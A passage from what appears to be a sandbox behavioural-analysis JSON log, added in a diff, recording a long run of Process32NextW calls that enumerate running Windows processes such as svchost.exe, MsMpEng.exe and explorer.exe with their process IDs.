"value": "880" + } + ], + "repeated": 0, + "id": 2417 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "932" + } + ], + "repeated": 0, + "id": 2418 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dwm.exe" + }, + { + "name": "ProcessId", + "value": "1004" + } + ], + "repeated": 0, + "id": 2419 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "520" + } + ], + "repeated": 0, + "id": 2420 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "696" + } + ], + "repeated": 0, + "id": 2421 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "844" + } + ], + "repeated": 0, + "id": 2422 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1100" + } + ], + "repeated": 0, + "id": 2423 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1120" + } + ], + "repeated": 0, + "id": 2424 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1140" + } + ], + "repeated": 0, + "id": 2425 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1152" + } + ], + "repeated": 0, + "id": 2426 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1172" + } + ], + "repeated": 0, + "id": 2427 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1224" + } + ], + "repeated": 0, + "id": 2428 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1328" + } + ], + "repeated": 0, + "id": 2429 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1392" + } + ], + "repeated": 0, + "id": 2430 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1400" + } + ], + "repeated": 0, + "id": 2431 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1492" + } + ], + "repeated": 0, + "id": 2432 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1604" + } + ], + "repeated": 0, + "id": 2433 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1612" + } + ], + "repeated": 0, + "id": 2434 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1636" + } + ], + "repeated": 0, + "id": 2435 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Memory Compression" + }, + { + "name": "ProcessId", + "value": "1700" + } + ], + "repeated": 0, + "id": 2436 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1712" + } + ], + "repeated": 0, + "id": 2437 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1736" + } + ], + "repeated": 0, + "id": 2438 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1776" + } + ], + "repeated": 0, + "id": 2439 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1784" + } + ], + "repeated": 0, + "id": 2440 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1864" + } + ], + "repeated": 0, + "id": 2441 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1940" + } + ], + "repeated": 0, + "id": 2442 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1988" + } + ], + "repeated": 0, + "id": 2443 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2020" + } + ], + "repeated": 0, + "id": 2444 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2040" + } + ], + "repeated": 0, + "id": 2445 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1044" + } + ], + "repeated": 0, + "id": 2446 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2084" + } + ], + "repeated": 0, + "id": 2447 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2132" + } + ], + "repeated": 0, + "id": 2448 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "spoolsv.exe" + }, + { + "name": "ProcessId", + "value": "2208" + } + ], + "repeated": 0, + "id": 2449 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2260" + } + ], + "repeated": 0, + "id": 2450 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2320" + } + ], + "repeated": 0, + "id": 2451 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2432" + } + ], + "repeated": 0, + "id": 2452 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2468" + } + ], + "repeated": 0, + "id": 2453 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2512" + } + ], + "repeated": 0, + "id": 2454 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2544" + } + ], + "repeated": 0, + "id": 2455 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2564" + } + ], + "repeated": 0, + "id": 2456 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2580" + } + ], + "repeated": 0, + "id": 2457 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2608" + } + ], + "repeated": 0, + "id": 2458 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2732" + } + ], + "repeated": 0, + "id": 2459 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2756" + } + ], + "repeated": 0, + "id": 2460 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2772" + } + ], + "repeated": 0, + "id": 2461 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MsMpEng.exe" + }, + { + "name": "ProcessId", + "value": "2780" + } + ], + "repeated": 0, + "id": 2462 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2892" + } + ], + "repeated": 0, + "id": 2463 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3004" + } + ], + "repeated": 0, + "id": 2464 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3216" + } + ], + "repeated": 0, + "id": 2465 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3544" + } + ], + "repeated": 0, + "id": 2466 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sihost.exe" + }, + { + "name": "ProcessId", + "value": "3724" + } + ], + "repeated": 0, + "id": 2467 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3740" + } + ], + "repeated": 0, + "id": 2468 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3768" + } + ], + "repeated": 0, + "id": 2469 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3868" + } + ], + "repeated": 0, + "id": 2470 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3928" + } + ], + "repeated": 0, + "id": 2471 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3940" + } + ], + "repeated": 0, + "id": 2472 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4056" + } + ], + "repeated": 0, + "id": 2473 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ctfmon.exe" + }, + { + "name": "ProcessId", + "value": "1564" + } + ], + "repeated": 0, + "id": 2474 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4132" + } + ], + "repeated": 0, + "id": 2475 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "explorer.exe" + }, + { + "name": "ProcessId", + "value": "4248" + } + ], + "repeated": 0, + "id": 2476 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4372" + } + ], + "repeated": 0, + "id": 2477 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4432" + } + ], + "repeated": 0, + "id": 2478 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4812" + } + ], + "repeated": 0, + "id": 2479 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4908" + } + ], + "repeated": 0, + "id": 2480 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4936" + } + ], + "repeated": 0, + "id": 2481 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "StartMenuExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "3508" + } + ], + "repeated": 0, + "id": 2482 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4712" + } + ], + "repeated": 0, + "id": 2483 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5144" + } + ], + "repeated": 0, + "id": 2484 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchApp.exe" + }, + { + "name": "ProcessId", + "value": "5324" + } + ], + "repeated": 0, + "id": 2485 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "5444" + } + ], + "repeated": 0, + "id": 2486 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchIndexer.exe" + }, + { + "name": "ProcessId", + "value": "5456" + } + ], + "repeated": 0, + "id": 2487 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5876" + } + ], + "repeated": 0, + "id": 2488 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smartscreen.exe" + }, + { + "name": "ProcessId", + "value": "6068" + } + ], + "repeated": 0, + "id": 2489 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthSystray.exe" + }, + { + "name": "ProcessId", + "value": "6108" + } + ], + "repeated": 0, + "id": 2490 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthService.exe" + }, + { + "name": "ProcessId", + "value": "5216" + } + ], + "repeated": 0, + "id": 2491 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6468" + } + ], + "repeated": 0, + "id": 2492 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7000" + } + ], + "repeated": 0, + "id": 2493 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ApplicationFrameHost.exe" + }, + { + "name": "ProcessId", + "value": "7132" + } + ], + "repeated": 0, + "id": 2494 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6384" + } + ], + "repeated": 0, + "id": 2495 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7592" + } + ], + "repeated": 0, + "id": 2496 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7620" + } + ], + "repeated": 0, + "id": 2497 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + 